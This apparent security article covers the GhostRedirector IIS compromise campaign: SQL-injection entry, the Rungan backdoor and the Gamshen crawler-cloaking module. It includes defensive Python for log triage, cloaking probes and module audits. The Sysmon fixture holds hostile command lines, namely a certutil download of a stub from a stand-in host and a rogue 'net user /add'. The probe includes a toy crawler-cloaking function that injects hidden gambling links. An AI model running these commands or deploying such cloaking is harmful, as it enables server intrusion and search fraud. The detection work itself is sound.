At least 65 internet-facing Windows servers have been quietly conscripted into an SEO fraud network, each one armed with a stealthy backdoor and a malicious IIS module that feeds manipulated content exclusively to search engine crawlers. The campaign, which ESET researchers have named GhostRedirector, was active between December 2024 and April 2025, with a follow-up scan in June 2025 confirming the infections. Victims span the globe but are heavily concentrated in Brazil, Thailand, and Vietnam, with additional servers compromised in the United States, Canada, Finland, India, the Netherlands, the Philippines, and Singapore.

What makes GhostRedirector especially insidious is its dual-purpose payload: Rungan, a native C++ backdoor that gives attackers persistent remote control, and Gamshen, a custom IIS module that performs crawler-aware cloaking. By altering HTTP responses only for bots like Googlebot, Gamshen injects backlinks and doorway pages that boost third-party gambling sites, hijacking the reputation of each compromised domain without ever disturbing the normal user experience.

ESET associates the activity with a China-aligned threat actor based on code artifacts, embedded language strings, and a code-signing certificate tied to a Shenzhen company. The attribution is probabilistic; researchers label it as "medium to high confidence" but caution that it remains a working hypothesis. For administrators, the immediate priority is detection and eradication, not geopolitical posturing.

The GhostRedirector Campaign at a Glance

The attacks all target internet-facing Windows servers running IIS. ESET's investigation points to a common initial entry point: a web application vulnerability, most likely SQL injection. Once inside, the operators execute operating system commands, typically via xp_cmdshell on the compromised SQL Server instance, and stage a downloader that fetches the full toolkit.

That toolkit includes privilege escalation exploits from the Potato family (EfsPotato, BadPotato), a collection of webshells in ASP, PHP, and JavaScript, the Rungan backdoor, and the Gamshen IIS module. The layering provides redundancy: if one implant is discovered and removed, the others remain to re-establish control.

So far, ESET has identified at least 65 confirmed victims, but that number almost certainly undercounts the true scale. Because normal visitors see nothing amiss, an infection can persist undetected for extended periods. The geographic spread suggests that no single industry or region is being singled out; any vulnerable IIS host can become a node in this hidden network.

Inside the Dual Implant: Rungan and Gamshen

Rungan: The Silent Backdoor

Rungan is compiled C++ malware designed for minimal noise and maximum flexibility. It registers listener endpoints and parses commands delivered through carefully crafted URL patterns. Capabilities observed by ESET include:

  • Executing arbitrary OS commands via CreateProcessA and returning output.
  • Creating new local user accounts (the mkuser command).
  • Enumerating file system directories (listfolder).
  • Adding new backdoor callback URLs (addurl).

On disk, Rungan is just another DLL. It can sit in an unremarkable folder such as ProgramData or alongside system files, and a plausible file name in either place gives a file-integrity scan that only watches system directories nothing to flag. Detecting it means looking at which process loaded the DLL, what URLs it registered, and what it does, not just at file names. ESET noted the backdoor masquerading under the name miniscreen.dll, but the name can be changed at will.

Gamshen: The Crawler Deceiver

Gamshen is a native IIS module—a DLL loaded directly into the IIS worker process, w3wp.exe. It inspects every incoming request and selectively rewrites HTTP responses when the user-agent or IP address matches search engine crawlers. This cloaking lets it:

  • Inject backlinks and redirects intended to manipulate search rankings.
  • Serve specialized doorway-page content only to bots.
  • Leave ordinary user traffic completely untouched, bypassing QA tests and manual site reviews.

By running in-process, Gamshen inherits the worker process's privileges and sees every request and response the site handles. ESET observed the module pushing links to gambling domains, consistent with SEO fraud offered as a service to third parties. The module's observed file names include ManagedEngine64_v2.dll and ManagedEngine32_v2.dll, which resemble the ManagedEngine entries IIS itself registers for ASP.NET; these names, too, can be changed.

Initial Access: SQL Injection and Escalation

The campaign relies heavily on poorly secured web applications. A successful SQL injection provides the foothold. From there, attackers enable xp_cmdshell to execute system commands, download a small stub, and then pull down the larger implant suite.

Next comes privilege escalation. The Potato family exploits (EfsPotato, BadPotato, and related tools) abuse the SeImpersonatePrivilege that IIS application pool identities and the SQL Server service account hold by default to obtain a SYSTEM token, giving the intruders full control of the server. With elevated access they install persistence: webshells in several scripting languages, rogue local user accounts, and binaries signed with the certificate mentioned above, which can pass allowlisting that trusts any valid signature.

ESET's findings underscore that patching a single SQL injection isn't sufficient; the entire web stack must be hardened to break the chain early. Disabling xp_cmdshell (and confirming with sp_configure that it stays disabled), running SQL Server under a low-privilege account, and keeping that account and the IIS application pool identities out of the local Administrators group are critical first steps.
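
As an added example (not ESET's or the page's own detection content), the following Python triages an export of Sysmon process-creation events for exactly this chain: a shell or download utility spawned by sqlservr.exe (xp_cmdshell) or by w3wp.exe (a webshell), and a child running as SYSTEM whose parent ran as a service account, which is what a Potato-style token impersonation looks like in the log. The event records, GUIDs, paths, staging URL and the "stub.exe" name are constructed; the watchlist of child executables is this example's assumption.

```python
"""Triage of Sysmon process-creation events (Event ID 1) for the chain
described above: SQL injection, xp_cmdshell, a downloader, then a
Potato-style jump to SYSTEM.

Added example, not ESET's detection content.  EVENTS is a constructed
export of Event ID 1 records using the field names Sysmon emits; GUIDs,
paths, the 'stub.exe' downloader name and the staging URL are invented.
SHELL_CHILDREN is this example's assumed watchlist.
"""
from __future__ import annotations

import ntpath

SERVER_PARENTS = {"sqlservr.exe", "w3wp.exe"}       # SQL Server and the IIS worker
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "certutil.exe", "bitsadmin.exe",
                  "curl.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
SYSTEM = "nt authority\\system"

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
W3WP = r"C:\Windows\System32\inetsrv\w3wp.exe"
CMD = r"C:\Windows\System32\cmd.exe"


def _ev(t, guid, parent_guid, image, parent_image, cmdline, user):
    """Build one Event ID 1 record with the Sysmon field names."""
    return {"EventId": 1, "UtcTime": t, "ProcessGuid": guid, "ParentProcessGuid": parent_guid,
            "Image": image, "ParentImage": parent_image, "CommandLine": cmdline, "User": user}


EVENTS = [  # constructed, in the order they happened
    _ev("2025-03-02 01:10:00.000", "{SQL1}", "{SVCS}", SQLSERVR,
        r"C:\Windows\System32\services.exe", '"sqlservr.exe" -sMSSQLSERVER', r"NT SERVICE\MSSQLSERVER"),
    _ev("2025-03-02 01:14:05.110", "{CMD1}", "{SQL1}", CMD, SQLSERVR,               # xp_cmdshell
        "cmd.exe /c certutil -urlcache -split -f http://staging.example/stub.exe C:\\ProgramData\\stub.exe",
        r"NT SERVICE\MSSQLSERVER"),
    _ev("2025-03-02 01:14:09.420", "{STUB}", "{CMD1}", r"C:\ProgramData\stub.exe", CMD,
        'C:\\ProgramData\\stub.exe "net user svc_backup /add"', r"NT SERVICE\MSSQLSERVER"),
    _ev("2025-03-02 01:14:09.615", "{CMD2}", "{STUB}", CMD, r"C:\ProgramData\stub.exe",
        "cmd.exe /c net user svc_backup /add", SYSTEM.upper()),                      # now SYSTEM
    _ev("2025-03-02 02:00:00.000", "{W3WP}", "{SVCH}", W3WP, r"C:\Windows\System32\svchost.exe",
        'w3wp.exe -ap "DefaultAppPool"', r"IIS APPPOOL\DefaultAppPool"),
    _ev("2025-03-02 02:31:44.003", "{CMD3}", "{W3WP}", CMD, W3WP,                    # webshell
        "cmd.exe /c whoami", r"IIS APPPOOL\DefaultAppPool"),
    _ev("2025-03-02 08:05:12.000", "{NOTE}", "{EXPL}", r"C:\Windows\System32\notepad.exe",
        r"C:\Windows\explorer.exe", "notepad.exe", r"CORP\alice"),                   # benign
]


def _base(path) -> str:
    return ntpath.basename(path or "").lower()


def _is_system(user) -> bool:
    return (user or "").lower() == SYSTEM


def triage(events: list) -> list:
    """Apply two rules to Event ID 1 records and return findings in time order.

    server-spawned-shell: sqlservr.exe or w3wp.exe starting a shell or a
        download utility (xp_cmdshell, or a webshell running commands).
    privilege-jump: a child running as SYSTEM whose parent, found by joining
        ParentProcessGuid to the parent's own creation event, ran as a lesser
        account.  Sysmon records only the child's user, so the join is what
        exposes a Potato-style token impersonation.
    """
    by_guid = {e["ProcessGuid"]: e for e in events if e.get("EventId") == 1}
    findings = []
    for e in sorted(by_guid.values(), key=lambda r: r["UtcTime"]):
        parent_img, child_img = _base(e.get("ParentImage")), _base(e.get("Image"))
        common = {"time": e["UtcTime"], "parent": parent_img, "child": child_img,
                  "cmdline": e.get("CommandLine")}
        if parent_img in SERVER_PARENTS and child_img in SHELL_CHILDREN:
            findings.append({"rule": "server-spawned-shell", "user": e.get("User"), **common})
        parent = by_guid.get(e.get("ParentProcessGuid"))
        if parent is not None and _is_system(e.get("User")) and not _is_system(parent.get("User")):
            findings.append({"rule": "privilege-jump",
                             "user": f"{parent.get('User')} -> {e.get('User')}", **common})
    return findings


def lineage(events: list, guid: str) -> list:
    """Walk ParentProcessGuid links back to the oldest recorded ancestor and
    return the image names root-first (handy for the incident write-up)."""
    by_guid = {e["ProcessGuid"]: e for e in events if e.get("EventId") == 1}
    chain, seen = [], set()
    while guid in by_guid and guid not in seen:
        seen.add(guid)
        chain.append(_base(by_guid[guid]["Image"]))
        guid = by_guid[guid].get("ParentProcessGuid")
    return chain[::-1]


if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"{f['time']}  {f['rule']:22} {f['parent']} -> {f['child']}  [{f['user']}]  {f['cmdline']}")
    print("lineage of {CMD2}:", " > ".join(lineage(EVENTS, "{CMD2}")))
```

Recent Sysmon versions also put a ParentUser field into Event ID 1, which turns the jump rule into a single-event test; on older builds the join above is the only way to see the parent's account, and it needs the parent's own creation event in the collected window. Long-lived w3wp.exe and sqlservr.exe processes often predate log collection, so also alert on any SYSTEM child of those two images regardless of whether the parent event is present.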

Crawler Cloaking: How Gamshen Works

The core innovation of GhostRedirector is its crawler cloaking module. Gamshen sits in the IIS request pipeline and checks each incoming user-agent string against a list of known search engine crawlers. When a match is found, it modifies the server's response—altering HTML, injecting links, or even redirecting the request to attacker-controlled landing pages.

Because everyday users and security scanners don't normally send crawler user-agents, the deceit can persist for months. Traditional integrity checks that compare production and staging sites won't catch it unless they specifically mimic crawler behavior. This creates a dangerous blind spot: a website can appear perfectly healthy while secretly funneling authority to gambling sites and accumulating penalties from Google and Bing.

The practice runs afoul of search engine guidelines on cloaking and link schemes. A domain caught participating risks being demoted or removed from search results entirely, even if the site owner is an innocent victim.

Detection: Unmasking the Hidden Fraud

The disclosure points to a straightforward detection playbook. The single most effective test is to request the same page twice and compare the responses:

  1. Send a request with a standard browser user-agent (e.g., Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36).
  2. Send an identical request but with a Googlebot user-agent (e.g., Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)).
  3. Compare the outputs. Differences in links, hidden elements, status codes, or redirects are a strong indicator of Gamshen; discount noise such as CSRF tokens, timestamps, or A/B variants, and repeat the test against several URLs, since cloaking need not apply to every path.
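
To make the comparison concrete, here is an added example in Python (not ESET's code and not the implant's). cloaked_response is a stand-in for a crawler-cloaking module as the previous section describes it, compare_responses is the detector from the numbered list, and fetch runs the two probes against a real URL. The sample page, the injected casino.example and slots.example links and the crawler regex are constructed for this example.

```python
"""Crawler-aware cloaking probe.

Added example (not ESET's code and not the implant's): cloaked_response is
a stand-in for a crawler-cloaking IIS module as described above, and
compare_responses is the detector.  fetch runs the two probes against a
real URL.  The sample page, the injected *.example links and the crawler
regex are constructed for this example.
"""
from __future__ import annotations

import re
import urllib.error
import urllib.request
from html.parser import HTMLParser

BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36")
GOOGLEBOT_UA = ("Mozilla/5.0 (compatible; Googlebot/2.1; "
                "+http://www.google.com/bot.html)")

# ---- stand-in for the cloaking module (constructed, for the demo) ----------
CRAWLER_RE = re.compile(r"googlebot|bingbot|yandexbot|baiduspider", re.I)
CLEAN_PAGE = ('<html><head><title>Acme Widgets</title></head><body>'
              '<h1>Welcome</h1><a href="/products">Products</a>'
              '<a href="/contact">Contact</a></body></html>')
INJECTED = ('<div style="display:none"><a href="http://casino.example/">casino</a>'
            '<a href="http://slots.example/win">slots</a></div>')


def cloaked_response(user_agent: str, page: str = CLEAN_PAGE):
    """Return (status, body, location).  Ordinary visitors get the page
    untouched; anything that looks like a crawler gets hidden doorway links."""
    if CRAWLER_RE.search(user_agent or ""):
        return 200, page.replace("</body>", INJECTED + "</body>"), None
    return 200, page, None


# ---- detector --------------------------------------------------------------
class _LinkCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.links = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.add(value)


def extract_links(html: str) -> set:
    parser = _LinkCollector()
    parser.feed(html)
    return parser.links


def compare_responses(browser, bot) -> dict:
    """Diff two (status, body, location) tuples for the same URL.  Links seen
    only by the bot, or a bot-only status/redirect, are the cloaking signals;
    size_delta is context for the analyst."""
    b_status, b_body, b_loc = browser
    c_status, c_body, c_loc = bot
    b_links, c_links = extract_links(b_body), extract_links(c_body)
    return {
        "status_differs": b_status != c_status,
        "redirect_differs": b_loc != c_loc,
        "bot_only_links": sorted(c_links - b_links),
        "browser_only_links": sorted(b_links - c_links),
        "size_delta": len(c_body) - len(b_body),
    }


def is_cloaked(result: dict) -> bool:
    return bool(result["status_differs"] or result["redirect_differs"]
                or result["bot_only_links"] or result["browser_only_links"])


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: a crawler-only 302 is itself the finding."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch(url: str, user_agent: str, timeout: float = 15.0):
    """Fetch url once with the given User-Agent -> (status, body, Location)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace"), resp.headers.get("Location")
    except urllib.error.HTTPError as err:      # 3xx/4xx/5xx still carry a body
        return err.code, err.read().decode("utf-8", "replace"), err.headers.get("Location")


def check_url(url: str) -> dict:
    """The test from the numbered list above: same URL, two user-agents."""
    return compare_responses(fetch(url, BROWSER_UA), fetch(url, GOOGLEBOT_UA))


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(check_url(sys.argv[1]))
    else:   # offline demo against the stand-in module
        print(compare_responses(cloaked_response(BROWSER_UA),
                                cloaked_response(GOOGLEBOT_UA)))
```

The probe only reveals cloaking keyed on the User-Agent header. If a module also keys on the source address, a probe from an arbitrary IP may be served clean pages; cross-check with Google Search Console's URL Inspection live test, which fetches from Google's own infrastructure, and review the IIS request logs for what Googlebot hits were actually served (with sc-bytes logging enabled, bot responses larger than browser responses for the same path are the same signal seen from the server side).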

Other detection steps include:

  • Enumerate IIS modules: run %windir%\System32\inetsrv\appcmd.exe list modules (or Get-WebGlobalModule in PowerShell) and inspect the <globalModules> section of applicationHost.config. Judge entries by image path and signature rather than by name: the legitimate ASP.NET entries are named ManagedEngine64 and ManagedEngineV4.0_32bit and point at webengine4.dll, so a ManagedEngine64_v2.dll or ManagedEngine32_v2.dll loaded from anywhere else is the tell.
  • Hunt known filenames: search for miniscreen.dll (Rungan), link.exe (a helper tool), and recently created binaries under ProgramData or the inetsrv directory. Treat the names as leads, not a complete list; they can be changed.
  • Monitor for Potato-style escalation: Sysmon does not log Win32 API calls such as CreateProcessWithTokenW or CreateProcessAsUserW, so look in its Event ID 1 process-creation records for a child running as NT AUTHORITY\SYSTEM whose parent runs as an application pool or SQL Server service account, for shells spawned by w3wp.exe or sqlservr.exe, and in Event ID 17/18 for unusual named-pipe creation. An EDR that hooks those token APIs can flag the impersonation directly.
  • Check for rogue accounts: review local users for recent additions (Security event ID 4720, "a user account was created") that could come from Rungan's mkuser command.
  • Inspect service registrations: look for anomalous ServiceDLL values under HKLM\SYSTEM\CurrentControlSet\Services\<name>\Parameters that could indicate a persistence hook.
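
The module inventory can be scripted against a copy of applicationHost.config, which is what the following added example (Python, not ESET's tooling) does. It judges each <globalModules> entry by where its DLL lives, by whether the DLL name appears in a baseline taken from a clean server, and by whether the entry name imitates Microsoft's ManagedEngine entries without pointing at webengine4.dll. The sample config, the baseline and the trusted roots are constructed assumptions about a default install; the ProgramData path of the rogue entry is invented.

```python
"""Audit of the <globalModules> section of IIS applicationHost.config.

Added example, not ESET's tooling.  Run it off-box against a copy of
%windir%\\System32\\inetsrv\\config\\applicationHost.config.  SAMPLE_CONFIG,
BASELINE and TRUSTED_ROOTS are this example's constructed data and
assumptions (default install paths); the two rogue entries reuse the file
names from the article, but the ProgramData location is invented.
"""
from __future__ import annotations

import ntpath
import re
import xml.etree.ElementTree as ET

# Where Microsoft-shipped native modules live on a default install (assumed).
TRUSTED_ROOTS = (
    "c:\\windows\\system32\\inetsrv\\",
    "c:\\windows\\microsoft.net\\framework\\",
    "c:\\windows\\microsoft.net\\framework64\\",
    "c:\\program files\\iis\\",                # ASP.NET Core module
)
# Variables applicationHost.config uses in image paths, resolved for a
# default C: install so the audit can run on a non-Windows analysis box.
_ENV = {"windir": "c:\\windows", "systemroot": "c:\\windows",
        "systemdrive": "c:", "programfiles": "c:\\program files"}
# An entry whose name mimics a Microsoft module must point at Microsoft's DLL.
LOOKALIKES = {"managedengine": "webengine4.dll"}


def normalize(image: str) -> str:
    """Expand %var% references, collapse '..' segments, lower-case."""
    expanded = re.sub(r"%(\w+)%",
                      lambda m: _ENV.get(m.group(1).lower(), m.group(0)), image)
    return ntpath.normpath(expanded.replace("/", "\\")).lower()


def audit(config_xml: str, baseline: set | None = None) -> list:
    """Return one finding per suspicious <globalModules><add> entry.

    untrusted-path : image lives outside TRUSTED_ROOTS
    not-in-baseline: image is inside a trusted root but its file name is
                     not in the supplied baseline of known-good DLL names
    lookalike-name : module name imitates a Microsoft entry but the DLL is
                     not the one Microsoft ships under that name
    """
    root = ET.fromstring(config_xml)
    findings = []
    for section in root.iter("globalModules"):
        for entry in section.findall("add"):
            name, image = entry.get("name", ""), entry.get("image", "")
            path = normalize(image)
            base = ntpath.basename(path)
            problems = []
            if not any(path.startswith(r) for r in TRUSTED_ROOTS):
                problems.append("untrusted-path")
            elif baseline is not None and base not in baseline:
                problems.append("not-in-baseline")
            for prefix, legit_dll in LOOKALIKES.items():
                if name.lower().startswith(prefix) and base != legit_dll:
                    problems.append("lookalike-name")
            if problems:
                findings.append({"name": name, "image": image, "problems": problems})
    return findings


# Constructed config: four genuine entries and two modelled on the article's names.
SAMPLE_CONFIG = r"""<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="ManagedEngine64" image="%windir%\Microsoft.NET\Framework64\v4.0.30319\webengine4.dll" preCondition="integratedMode,runtimeVersionv4.0,bitness64" />
      <add name="AspNetCoreModuleV2" image="%ProgramFiles%\IIS\Asp.Net Core Module\V2\aspnetcorev2.dll" />
      <add name="ManagedEngine64_v2" image="%SystemDrive%\ProgramData\ManagedEngine64_v2.dll" preCondition="bitness64" />
      <add name="ManagedEngine32_v2" image="%windir%\System32\inetsrv\ManagedEngine32_v2.dll" preCondition="bitness32" />
    </globalModules>
  </system.webServer>
</configuration>
"""

# DLL file names from a known-good server's globalModules (constructed here).
BASELINE = {"loghttp.dll", "static.dll", "webengine4.dll", "aspnetcorev2.dll"}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:   # the real file carries a UTF-8 BOM
        with open(sys.argv[1], encoding="utf-8-sig") as fh:
            xml_text = fh.read()
    else:
        xml_text = SAMPLE_CONFIG
    for f in audit(xml_text, BASELINE):
        print(f"{', '.join(f['problems']):30} {f['name']}  ->  {f['image']}")
```

Build BASELINE from the same section on a freshly installed server of the same IIS version. A DLL that passes all three checks can still be a replaced file, so for anything under inetsrv also verify the Authenticode signature and compare hashes against the clean install.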

If any of these indicators are found, treat the server as fully compromised. A quick file delete or module unload is rarely enough.

Mitigation: Eradicating a Bespoke Threat

Partial remediation is a fool's errand in GhostRedirector cases. The layered implants (Rungan on disk, Gamshen inside the IIS worker process, plus webshells and rogue accounts elsewhere) virtually guarantee a relapse. The safest course is a full rebuild from known-good images. The checklist:

  • Isolate the infected host immediately and preserve forensic artifacts: a memory image, a w3wp.exe process dump, Windows event logs, IIS request logs (they record every crawler request the module answered), applicationHost.config, and the web root.
  • Rebuild the server from scratch. Do not rely on in-place removal.
  • Rotate every credential that touched the compromised system, including service accounts, database passwords, and any application secrets stored on it. You cannot revoke a code-signing certificate you do not own; add the attacker's certificate to the Untrusted Certificates store across the estate and report it to the issuing CA.
  • Harden the web application: patch and remediate SQL injection and command injection vectors; disable xp_cmdshell; restrict the SQL Server service account's OS privileges.
  • Deploy a WAF with SQL injection protection, tuned to your traffic patterns.
  • Coordinate with SEO specialists and submit search engine reconsideration requests after cleanup to undo penalties.

Remember to test as a crawler during and after cleanup to verify that cloaking is fully eliminated.

Business and SEO Fallout

While GhostRedirector doesn't directly steal data or deface pages, the business consequences can be severe. Search engines penalize cloaking and manipulative backlink schemes harshly. Once Google or Bing flags a domain for cloaking, organic traffic can plummet, devastating revenue and brand visibility. Even after remediation, trust may take months to restore.

Brand damage extends beyond search rankings. Partners and customers who discover the compromise may question security competence, even if no visible harm occurred. In regulated industries—such as healthcare (HIPAA), education (FERPA), or finance (PCI DSS)—the presence of an undetected backdoor may trigger mandatory breach notifications and legal scrutiny, multiplying costs. For organizations that process personal data under GDPR or similar frameworks, the discovery of unauthorized control over web responses could be considered a reportable incident.

Strengths of the Adversary

GhostRedirector demonstrates a mature operational model. The attackers' strengths lie in:

  • In-process persistence: Gamshen runs inside the IIS worker process as a registered module, so on disk it looks like any other IIS extension and at runtime its activity is ordinary request handling; nothing flags it unless someone checks the module inventory or the crawler-facing responses.
  • Layered redundancy: multiple footholds (webshells, rogue accounts, Rungan's callback URLs, and Potato tools to re-escalate) make cleanup difficult.
  • Low-noise monetization: SEO fraud generates revenue without the high network noise of ransomware or cryptomining, allowing long dwell times.

Because the campaign flies under the radar, a single compromised IIS estate can remain a persistent, monetizable asset for long stretches, funneling link juice to paying customers.

What Comes Next

The 65 known victims likely represent the tip of the iceberg. As long as SQL injection and similar web vulnerabilities remain common, the campaign can scale rapidly. It is reasonable to expect copycat groups to adopt the technique and build similar crawler-cloaking IIS modules for other verticals; the underlying code is not overly complex, and its power lies in the operational concept.

Future variants of Rungan could incorporate lateral movement capabilities or additional stealth features, complicating incident response further. Organizations must assume that internet-facing IIS servers are high-value targets and harden them accordingly.

Long-Term Hardening Guidance

To reduce the risk of GhostRedirector-style attacks, organizations should adopt a defense-in-depth posture:

  • Treat internet-facing IIS servers as critical assets, applying controls and monitoring similar to domain controllers or VPN concentrators.
  • Enforce least privilege for service accounts. Require multi-factor authentication and just-in-time elevation for administrative actions that can register modules or modify applicationHost.config.
  • Implement robust telemetry: deploy EDR with module-load detection, enable Sysmon process-creation (Event ID 1), image-load (Event ID 7, which records every DLL loaded into w3wp.exe) and named-pipe (Event ID 17/18) logging, and centralize IIS logs so crawler and browser requests for the same path can be compared.
  • Regularly audit and inventory IIS modules and code-signing certificates. Block unsigned or unexpected native extensions where possible.
  • Include SEO integrity as part of incident response: monitor Google Search Console and backlink profiles for anomalies, and establish cross-team notifications when suspicious crawler behavior is detected.

Conclusion: Reputation as an Attack Surface

GhostRedirector redefines what it means to secure a web server. Defenders must now guard not only data and uptime but also the invisible signals flowing to search engines. A website's reputation with Google is a tangible, monetizable asset—and attackers have shown it can be quietly hijacked.

Immediate crawler-aware hunts, robust behavioral telemetry, and a commitment to full rebuilds upon compromise are the only reliable defenses. Administrators should inventory IIS modules, deploy EDR with module-load detection, and make search engine integrity part of their incident response playbook. The lesson is clear: what you don't see can rank you down, and the cost of inaction is measured not just in dollars but in lost trust and search visibility.